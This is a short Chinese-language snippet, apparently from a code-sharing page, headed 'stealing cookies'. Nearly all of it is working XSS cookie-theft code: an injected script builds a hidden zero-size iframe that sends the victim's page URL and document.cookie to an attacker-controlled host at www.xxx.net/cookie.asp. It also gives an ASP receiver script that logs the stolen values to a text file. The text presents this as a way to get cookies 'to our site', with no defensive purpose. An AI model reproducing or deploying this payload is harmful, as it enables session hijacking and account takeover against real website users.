偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为: var code; var target = "http://www.xxx.net/cookie.asp?"; info=escape(document.location+"@@@"+document.cookie); target=target+info; code="<iframe style=\’display:none;\’ src="; code=code+target; code=code+" width=0 height=0></iframe>"; document.write(code); 这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为: 复制代码代码如下:dim fso,file,str str=unescape(request.Servervariables(\”QUERY_STRING\”)) Const ForReading = 1, ForWriting = 2, ForAppending = 8 Set fso = Server.CreateObject(\”Scripting.FileSystemObject\”) path = server.mappath(\”xxx.txt\”) set file=fso.opentextfile(path, ForAppending, TRUE) file.write(\”Xss:\”) file.write(str) file.write vbCrLf file.close set file = nothing set fso = nothing
